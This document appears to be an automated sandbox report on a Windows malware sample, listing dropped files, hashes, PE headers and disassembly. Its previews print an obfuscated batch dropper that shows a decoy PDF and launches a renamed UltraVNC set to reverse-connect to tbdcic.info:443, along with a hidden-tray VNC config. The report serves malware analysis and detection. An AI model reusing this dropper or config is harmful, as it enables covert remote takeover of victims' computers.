                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                  Category:dropped
                                                                  Size (bytes):386528
                                                                  Entropy (8bit):7.9736851559892425
                                                                  Encrypted:false
                                                                  SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                  MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                  SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                  SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                  SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                  Malicious:false
                                                                  Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                  Category:dropped
                                                                  Size (bytes):605114
                                                                  Entropy (8bit):7.931189302613814
                                                                  Encrypted:false
                                                                  SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                  MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                  SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                  SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                  SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                  Malicious:false
                                                                  Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:DOS batch file, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1063
                                                                  Entropy (8bit):5.649012890742747
                                                                  Encrypted:false
                                                                  SSDEEP:24:g7JL6o/0aEMk4SH2ZckJeqIjq+JG4v/aJeqT2aJHfth439HJGVfx/m:8D/hL12q+K1HW39HSfx/m
                                                                  MD5:1BE7E5C957D00F505D8F9916CF850EE9
                                                                  SHA1:FB7573845F343A8ECA85451F1E2E58AFCEB0AC6B
                                                                  SHA-256:FCDED7D427BD65E160F5C792B38C5139B0C0B557F236B6F1D4636341F1E8BB32
                                                                  SHA-512:292DD30C40ED41E9F9335A5D0518F045629E6906FB4A51A4A4001F56BE9F393DD009E7D3B8DE04F83B1907B543716497603946818F931C6095E5C49B3006F8AA
                                                                  Malicious:false
                                                                  Preview:@echo off.setlocal enabledelayedexpansion.set vrh8AP=nhost.set muJYZp=nne.set BkbbBh=co.set MOaMlN=exe.set v0nVqH=Lom.set ZlYUDn=pdf.set UIS2A9=raVNC.set AHvFn8=%COMPUTERNAME%.set qVC5W0=autore.set WSmdXm=%WINDIR%\Tasks\144012088.cmd.set K7aM5W=tbdcic.info.set oSxXQL=TtF9ns.set sUWZqy=443.set XvryyK=co.set E3PqLw=ct.set RMGYdl=Ult.set jQMRAv=sync_browser.set WOH7MQ=ini.timeout /t 1.copy "ndymzn.PPYh2u" "%HOMEPATH%\Downloads\%v0nVqH%.%ZlYUDn%" & start "" "%HOMEPATH%\Downloads\%v0nVqH%.%ZlYUDn%".timeout /t 1.taskkill /f /im %jQMRAv%.%MOaMlN% .timeout /t 2.copy "Fgyxfc.Qnwi4I" "%jQMRAv%.%MOaMlN%".timeout /t 1.copy "B7MqI9.IYF1N0" "%RMGYdl%%UIS2A9%.%WOH7MQ%".timeout /t 2.start "" %WINDIR%\Tasks\%jQMRAv%.%MOaMlN% .timeout /t 8.start "" %WINDIR%\Tasks\%jQMRAv%.%MOaMlN% -%qVC5W0%%BkbbBh%%muJYZp%%E3PqLw% -id:%AHvFn8%_%oSxXQL% -%BkbbBh%%muJYZp%%E3PqLw% %K7aM5W%:%sUWZqy%.timeout /t 2.copy "Ivn55G.PqhJnU" "%XvryyK%%vrh8AP%.%MOaMlN%".timeout /t 4.:loop.if exist "%WSmdXm%" (. cmd /c "%WSmdXm%". tim
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:DOS batch file, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1063
                                                                  Entropy (8bit):5.649012890742747
                                                                  Encrypted:false
                                                                  SSDEEP:24:g7JL6o/0aEMk4SH2ZckJeqIjq+JG4v/aJeqT2aJHfth439HJGVfx/m:8D/hL12q+K1HW39HSfx/m
                                                                  MD5:1BE7E5C957D00F505D8F9916CF850EE9
                                                                  SHA1:FB7573845F343A8ECA85451F1E2E58AFCEB0AC6B
                                                                  SHA-256:FCDED7D427BD65E160F5C792B38C5139B0C0B557F236B6F1D4636341F1E8BB32
                                                                  SHA-512:292DD30C40ED41E9F9335A5D0518F045629E6906FB4A51A4A4001F56BE9F393DD009E7D3B8DE04F83B1907B543716497603946818F931C6095E5C49B3006F8AA
                                                                  Malicious:false
                                                                  Preview:@echo off.setlocal enabledelayedexpansion.set vrh8AP=nhost.set muJYZp=nne.set BkbbBh=co.set MOaMlN=exe.set v0nVqH=Lom.set ZlYUDn=pdf.set UIS2A9=raVNC.set AHvFn8=%COMPUTERNAME%.set qVC5W0=autore.set WSmdXm=%WINDIR%\Tasks\144012088.cmd.set K7aM5W=tbdcic.info.set oSxXQL=TtF9ns.set sUWZqy=443.set XvryyK=co.set E3PqLw=ct.set RMGYdl=Ult.set jQMRAv=sync_browser.set WOH7MQ=ini.timeout /t 1.copy "ndymzn.PPYh2u" "%HOMEPATH%\Downloads\%v0nVqH%.%ZlYUDn%" & start "" "%HOMEPATH%\Downloads\%v0nVqH%.%ZlYUDn%".timeout /t 1.taskkill /f /im %jQMRAv%.%MOaMlN% .timeout /t 2.copy "Fgyxfc.Qnwi4I" "%jQMRAv%.%MOaMlN%".timeout /t 1.copy "B7MqI9.IYF1N0" "%RMGYdl%%UIS2A9%.%WOH7MQ%".timeout /t 2.start "" %WINDIR%\Tasks\%jQMRAv%.%MOaMlN% .timeout /t 8.start "" %WINDIR%\Tasks\%jQMRAv%.%MOaMlN% -%qVC5W0%%BkbbBh%%muJYZp%%E3PqLw% -id:%AHvFn8%_%oSxXQL% -%BkbbBh%%muJYZp%%E3PqLw% %K7aM5W%:%sUWZqy%.timeout /t 2.copy "Ivn55G.PqhJnU" "%XvryyK%%vrh8AP%.%MOaMlN%".timeout /t 4.:loop.if exist "%WSmdXm%" (. cmd /c "%WSmdXm%". tim
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:Generic INItialization configuration [admin]
                                                                  Category:dropped
                                                                  Size (bytes):858
                                                                  Entropy (8bit):5.216893826927931
                                                                  Encrypted:false
                                                                  SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                  MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                  SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                  SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                  SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                  Malicious:false
                                                                  Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1945368
                                                                  Entropy (8bit):6.532894678367002
                                                                  Encrypted:false
                                                                  SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                  MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                  SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                  SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                  SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\Fgyxfc.Qnwi4I, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):867840
                                                                  Entropy (8bit):6.386550733462827
                                                                  Encrypted:false
                                                                  SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                  MD5:0F568F6C821565AB9FF45C7457953789
                                                                  SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                  SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                  SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:Generic INItialization configuration [admin]
                                                                  Category:dropped
                                                                  Size (bytes):858
                                                                  Entropy (8bit):5.216893826927931
                                                                  Encrypted:false
                                                                  SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                  MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                  SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                  SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                  SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                  Malicious:false
                                                                  Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):867840
                                                                  Entropy (8bit):6.386550733462827
                                                                  Encrypted:false
                                                                  SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                  MD5:0F568F6C821565AB9FF45C7457953789
                                                                  SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                  SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                  SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                  Category:dropped
                                                                  Size (bytes):605114
                                                                  Entropy (8bit):7.931189302613814
                                                                  Encrypted:false
                                                                  SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                  MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                  SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                  SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                  SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                  Malicious:false
                                                                  Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1945368
                                                                  Entropy (8bit):6.532894678367002
                                                                  Encrypted:false
                                                                  SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                  MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                  SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                  SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                  SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.954366715970979
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:mSRW5AfJpC.exe
                                                                  File size:1'648'766 bytes
                                                                  MD5:95bb89ebdcec89e123e5647555d63aed
                                                                  SHA1:e7aa5b272cb301dfda33956a37aa9506d176e6ce
                                                                  SHA256:41a6e70e243bcded4033dc8050773fd3bd8870da995c4df2cba861bd2492e88c
                                                                  SHA512:3fc254cf08e8bcf40c64c27597ff999a4ea1cfe4d1abd0fe3902ec81f86abc800fca041fe5f554059f5373838e0a83403225a4d4ede4e604809b24e0bb0f7c16
                                                                  SSDEEP:24576:WKWs4oTukLOqd5AhJBMT6W6OoxHKVJxMl/5x9qpeZ8PNdzF77/voe2D7UGxxy+vy:TF6kqqLAdMT6W6O/rxM17z8dzZoe2DNA
                                                                  TLSH:24752345F681C9F0EEA3227050716D132BA3ED1E1A151DCF728CFA127931652BA2FA77
                                                                  File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...-..P.................2...H....../8.......P....@.........................................................................$s.............................
                                                                  Icon Hash:357561d6dad24d55
                                                                  Entrypoint:0x41382f
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x50E0002D [Sun Dec 30 08:49:49 2012 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:1d1577d864d2da06952f7affd8635371
                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push FFFFFFFFh
                                                                  push 00416E98h
                                                                  push 004139C0h
                                                                  mov eax, dword ptr fs:[00000000h]
                                                                  push eax
                                                                  mov dword ptr fs:[00000000h], esp
                                                                  sub esp, 68h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  mov dword ptr [ebp-18h], esp
                                                                  xor ebx, ebx
                                                                  mov dword ptr [ebp-04h], ebx
                                                                  push 00000002h
                                                                  call dword ptr [004151DCh]
                                                                  pop ecx
                                                                  or dword ptr [0041B9E4h], FFFFFFFFh
                                                                  or dword ptr [0041B9E8h], FFFFFFFFh
                                                                  call dword ptr [004151E0h]
                                                                  mov ecx, dword ptr [004199C4h]
                                                                  mov dword ptr [eax], ecx
                                                                  call dword ptr [004151E4h]
                                                                  mov ecx, dword ptr [004199C0h]
                                                                  mov dword ptr [eax], ecx
                                                                  mov eax, dword ptr [004151E8h]
                                                                  mov eax, dword ptr [eax]
                                                                  mov dword ptr [0041B9E0h], eax
                                                                  call 00007FC740E6BD12h
                                                                  cmp dword ptr [00419780h], ebx
                                                                  jne 00007FC740E6BBFEh
                                                                  push 004139B8h
                                                                  call dword ptr [004151ECh]
                                                                  pop ecx
                                                                  call 00007FC740E6BCE4h
                                                                  push 00419050h
                                                                  push 0041904Ch
                                                                  call 00007FC740E6BCCFh
                                                                  mov eax, dword ptr [004199BCh]
                                                                  mov dword ptr [ebp-6Ch], eax
                                                                  lea eax, dword ptr [ebp-6Ch]
                                                                  push eax
                                                                  push dword ptr [004199B8h]
                                                                  lea eax, dword ptr [ebp-64h]
                                                                  push eax
                                                                  lea eax, dword ptr [ebp-70h]
                                                                  push eax
                                                                  lea eax, dword ptr [ebp-60h]
                                                                  push eax
                                                                  call dword ptr [004151F4h]
                                                                  push 00419048h
                                                                  push 00419000h
                                                                  call 00007FC740E6BC9Ch
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x173240xc8.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x309f0.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x150000x364.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x130f00x13200a86014994324ad6f47bddf386fd89176False0.6081495098039216data6.614408281478693IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x150000x35600x36009abc217bd20b39b1db2f57ddf9bc789cFalse0.4381510416666667data5.5938980842785995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x190000x29ec0x8004c129856aeef51c872b4a2f6db01e9bdFalse0.44580078125data3.8126171673069433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x1c0000x309f00x30a0070476287931779f9a3d21275cc034d80False0.7721621947300771data7.423399046641766IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0x1c2800x18dePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedRussianRussia0.9696826892868363
                                                                  RT_ICON0x1db600x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896RussianRussia0.08974964572508266
                                                                  RT_ICON0x21d880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600RussianRussia0.12935684647302906
                                                                  RT_ICON0x243300x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 6720RussianRussia0.16553254437869822
                                                                  RT_ICON0x25d980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.21106941838649157
                                                                  RT_ICON0x26e400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400RussianRussia0.29508196721311475
                                                                  RT_ICON0x277c80x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 1680RussianRussia0.33313953488372094
                                                                  RT_ICON0x27e800x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.4592198581560284
                                                                  RT_GROUP_ICON0x282e80x76dataRussianRussia0.7457627118644068
                                                                  RT_VERSION0x283600x350data0.4693396226415094
                                                                  RT_MANIFEST0x286b00x33cASCII text, with CRLF line terminatorsEnglishUnited States0.501207729468599
                                                                  DLLImport
                                                                  COMCTL32.dll
                                                                  SHELL32.dllSHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
                                                                  GDI32.dllCreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
                                                                  ADVAPI32.dllFreeSid, AllocateAndInitializeSid, CheckTokenMembership
